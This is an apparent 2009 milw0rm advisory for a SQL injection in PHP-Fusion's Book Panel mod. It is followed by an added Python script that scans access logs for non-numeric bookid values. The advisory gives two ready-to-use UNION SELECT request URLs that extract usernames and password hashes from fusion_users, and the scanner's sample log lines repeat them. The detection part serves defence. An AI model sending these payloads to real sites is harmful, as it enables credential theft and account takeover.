/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\
+                                                                                                                       +
+  |----------------------------------------------------------------|                                                   +
+  | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability |                                                   +
+  |----------------------------------------------------------------|                                                   +
+                                                                                                                       +
+  [-] ...Something I do out of pure passion, something I like and am fascinated by :-)                                 +
+                                                                                                                       +
+  |--------------------------------|                                                                                   +
+  | Author: elusiven from Poland ! |                                                                                   +
+  | Contact: elusivenpl@gmail.com  |                                                                                   +
+  | Greetings: Fusi0n Group        |                                                                                   +
+  |--------------------------------|                                                                                   +
+                                                                                                                       +
+  Exploit:                                                                                                             +
+                                                                                                                       +
+  http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--          +
+  http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--      +
+                                                                                                                       +
\+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/

/join #wyjadacze on irc.quakenet.org

# milw0rm.com [2009-03-09]
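
Added example, not part of the original advisory: a log check a defender can run to find requests that hit book_panel/books.php with a bookid that is not a plain number, which is what both request strings above look like in an access log. The log lines, the /fusion/ path prefix, the function name and the rule that a legitimate bookid is decimal digits only are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); addresses and the
# /fusion/ install path are made up for this example.
SAMPLE_LOG = """\
192.0.2.10 - - [09/Mar/2009:10:00:01 +0000] "GET /fusion/book_panel/books.php?bookid=12 HTTP/1.1" 200 5120
192.0.2.44 - - [09/Mar/2009:10:02:17 +0000] "GET /fusion/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users-- HTTP/1.1" 200 4871
192.0.2.44 - - [09/Mar/2009:10:02:31 +0000] "GET /fusion/book_panel/books.php?bookid=-1%20UNION%20SELECT%201,2,user_password,4,5,6%20FROM%20fusion_users-- HTTP/1.1" 200 4902
192.0.2.10 - - [09/Mar/2009:10:05:00 +0000] "GET /fusion/news.php?bookid=abc HTTP/1.1" 200 900
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_SCRIPT = "/book_panel/books.php"
# Assumption: a legitimate book id is decimal digits only.
NUMERIC_ID = re.compile(r"[0-9]+")


def suspicious_bookid_requests(log_text):
    """Return (client, decoded bookid) for books.php hits with a non-numeric bookid."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(TARGET_SCRIPT):
            continue
        # parse_qs decodes both '+' and %20 to spaces, so either encoding of
        # the same request is compared in its decoded form.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("bookid", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_bookid_requests(SAMPLE_LOG):
        print(f"{client}\tbookid={value!r}")
```

The same digits-only rule, applied to bookid in books.php before the value reaches the query, is the corresponding fix on the application side.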